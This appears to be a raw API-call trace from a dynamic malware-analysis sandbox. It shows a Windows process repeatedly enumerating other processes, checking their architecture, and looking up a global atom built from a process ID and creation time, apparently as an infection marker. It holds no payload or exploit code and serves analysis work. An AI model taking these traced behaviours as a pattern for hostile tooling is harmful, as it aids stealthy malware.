	[0080.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.105] CloseHandle (hObject=0x224) returned 1
	[0080.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0080.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.105] CloseHandle (hObject=0x224) returned 1
	[0080.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0080.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.105] CloseHandle (hObject=0x224) returned 1
	[0080.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0080.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.105] CloseHandle (hObject=0x224) returned 1
	[0080.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0080.105] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.105] CloseHandle (hObject=0x224) returned 1
	[0080.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0080.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.106] CloseHandle (hObject=0x224) returned 1
	[0080.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0080.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0080.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.106] CloseHandle (hObject=0x224) returned 1
	[0080.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0080.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.106] CloseHandle (hObject=0x224) returned 1
	[0080.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0080.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.106] CloseHandle (hObject=0x224) returned 1
	[0080.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0080.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0080.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.106] CloseHandle (hObject=0x224) returned 1
	[0080.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0080.106] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.107] CloseHandle (hObject=0x224) returned 1
	[0080.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0080.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.107] CloseHandle (hObject=0x224) returned 1
	[0080.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0080.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.107] CloseHandle (hObject=0x224) returned 1
	[0080.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0080.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.107] CloseHandle (hObject=0x224) returned 1
	[0080.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0080.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.107] CloseHandle (hObject=0x224) returned 1
	[0080.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0080.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.107] CloseHandle (hObject=0x224) returned 1
	[0080.107] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0080.107] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.108] CloseHandle (hObject=0x224) returned 1
	[0080.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0080.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.108] CloseHandle (hObject=0x224) returned 1
	[0080.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0080.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.108] CloseHandle (hObject=0x224) returned 1
	[0080.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0080.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.108] CloseHandle (hObject=0x224) returned 1
	[0080.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0080.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.108] CloseHandle (hObject=0x224) returned 1
	[0080.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0080.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.108] CloseHandle (hObject=0x224) returned 1
	[0080.108] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0080.108] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.109] CloseHandle (hObject=0x224) returned 1
	[0080.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0080.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.109] CloseHandle (hObject=0x224) returned 1
	[0080.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0080.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.109] CloseHandle (hObject=0x224) returned 1
	[0080.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0080.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.109] CloseHandle (hObject=0x224) returned 1
	[0080.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0080.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.109] CloseHandle (hObject=0x224) returned 1
	[0080.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0080.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.109] CloseHandle (hObject=0x224) returned 1
	[0080.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0080.109] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.109] CloseHandle (hObject=0x224) returned 1
	[0080.109] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0080.110] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.110] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0080.110] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0080.110] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0080.110] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.110] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0080.110] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.110] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0080.110] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0080.111] CloseHandle (hObject=0x224) returned 1
	[0080.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0080.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0080.111] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0080.111] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.111] CloseHandle (hObject=0x224) returned 1
	[0080.182] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0080.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0080.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0080.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0080.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0080.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0080.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0080.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0080.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0080.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0080.183] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0080.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0080.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0080.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0080.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0080.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0080.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0080.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0080.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0080.184] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.184] CloseHandle (hObject=0x224) returned 1
	[0080.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0080.184] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0080.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0080.185] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.185] CloseHandle (hObject=0x224) returned 1
	[0080.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0080.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0080.185] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.185] CloseHandle (hObject=0x224) returned 1
	[0080.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0080.185] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.185] CloseHandle (hObject=0x224) returned 1
	[0080.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0080.185] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.185] CloseHandle (hObject=0x224) returned 1
	[0080.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0080.185] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.185] CloseHandle (hObject=0x224) returned 1
	[0080.185] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0080.185] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.186] CloseHandle (hObject=0x224) returned 1
	[0080.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0080.186] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.186] CloseHandle (hObject=0x224) returned 1
	[0080.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0080.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0080.186] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.186] CloseHandle (hObject=0x224) returned 1
	[0080.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0080.186] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.186] CloseHandle (hObject=0x224) returned 1
	[0080.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0080.186] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.186] CloseHandle (hObject=0x224) returned 1
	[0080.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0080.186] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0080.186] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.186] CloseHandle (hObject=0x224) returned 1
	[0080.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x224
	[0080.187] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.187] CloseHandle (hObject=0x224) returned 1
	[0080.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x224
	[0080.187] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.187] CloseHandle (hObject=0x224) returned 1
	[0080.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x224
	[0080.187] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.187] CloseHandle (hObject=0x224) returned 1
	[0080.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x224
	[0080.187] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.187] CloseHandle (hObject=0x224) returned 1
	[0080.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x224
	[0080.187] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.187] CloseHandle (hObject=0x224) returned 1
	[0080.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x224
	[0080.187] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.187] CloseHandle (hObject=0x224) returned 1
	[0080.187] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x224
	[0080.187] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.187] CloseHandle (hObject=0x224) returned 1
	[0080.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x224
	[0080.188] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.188] CloseHandle (hObject=0x224) returned 1
	[0080.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x224
	[0080.188] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.188] CloseHandle (hObject=0x224) returned 1
	[0080.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x224
	[0080.188] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.188] CloseHandle (hObject=0x224) returned 1
	[0080.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x224
	[0080.188] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.188] CloseHandle (hObject=0x224) returned 1
	[0080.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x224
	[0080.188] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.188] CloseHandle (hObject=0x224) returned 1
	[0080.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x224
	[0080.188] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.188] CloseHandle (hObject=0x224) returned 1
	[0080.188] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x224
	[0080.188] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.189] CloseHandle (hObject=0x224) returned 1
	[0080.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x224
	[0080.189] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.189] CloseHandle (hObject=0x224) returned 1
	[0080.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x224
	[0080.189] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.189] CloseHandle (hObject=0x224) returned 1
	[0080.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x224
	[0080.189] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.189] CloseHandle (hObject=0x224) returned 1
	[0080.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x224
	[0080.189] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.189] CloseHandle (hObject=0x224) returned 1
	[0080.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0080.189] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.189] CloseHandle (hObject=0x224) returned 1
	[0080.189] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x224
	[0080.190] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.190] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0080.190] GetProcessTimes (in: hProcess=0x224, lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4 | out: lpCreationTime=0x27efadc, lpExitTime=0x27efac4, lpKernelTime=0x27efacc, lpUserTime=0x27efad4) returned 1
	[0080.190] wsprintfA (in: param_1=0x710e08, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0080.190] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.190] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0080.190] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0080.190] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0080.190] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc000
	[0080.190] CloseHandle (hObject=0x224) returned 1
	[0080.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0080.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x940) returned 0x0
	[0080.191] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdb8) returned 0x224
	[0080.191] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.191] CloseHandle (hObject=0x224) returned 1
	[0080.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0080.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0080.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0080.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0080.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0080.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0080.285] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0080.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0080.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0080.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0080.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0080.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0080.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0080.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0080.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0080.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0080.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0080.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0080.286] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x224
	[0080.287] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.287] CloseHandle (hObject=0x224) returned 1
	[0080.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0080.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0080.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x224
	[0080.287] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.287] CloseHandle (hObject=0x224) returned 1
	[0080.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0080.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x224
	[0080.287] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.287] CloseHandle (hObject=0x224) returned 1
	[0080.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x224
	[0080.287] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.287] CloseHandle (hObject=0x224) returned 1
	[0080.287] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x224
	[0080.287] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.288] CloseHandle (hObject=0x224) returned 1
	[0080.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x224
	[0080.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.288] CloseHandle (hObject=0x224) returned 1
	[0080.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x224
	[0080.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.288] CloseHandle (hObject=0x224) returned 1
	[0080.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x224
	[0080.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.288] CloseHandle (hObject=0x224) returned 1
	[0080.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0080.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x224
	[0080.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.288] CloseHandle (hObject=0x224) returned 1
	[0080.288] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x224
	[0080.288] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.288] CloseHandle (hObject=0x224) returned 1
	[0080.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x224
	[0080.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.289] CloseHandle (hObject=0x224) returned 1
	[0080.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xddc) returned 0x0
	[0080.289] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x224
	[0080.289] IsWow64Process (in: hProcess=0x224, Wow64Process=0x27efe94 | out: Wow64Process=0x27efe94) returned 1
	[0080.289] CloseHandle (hObject=0x224) returned 1
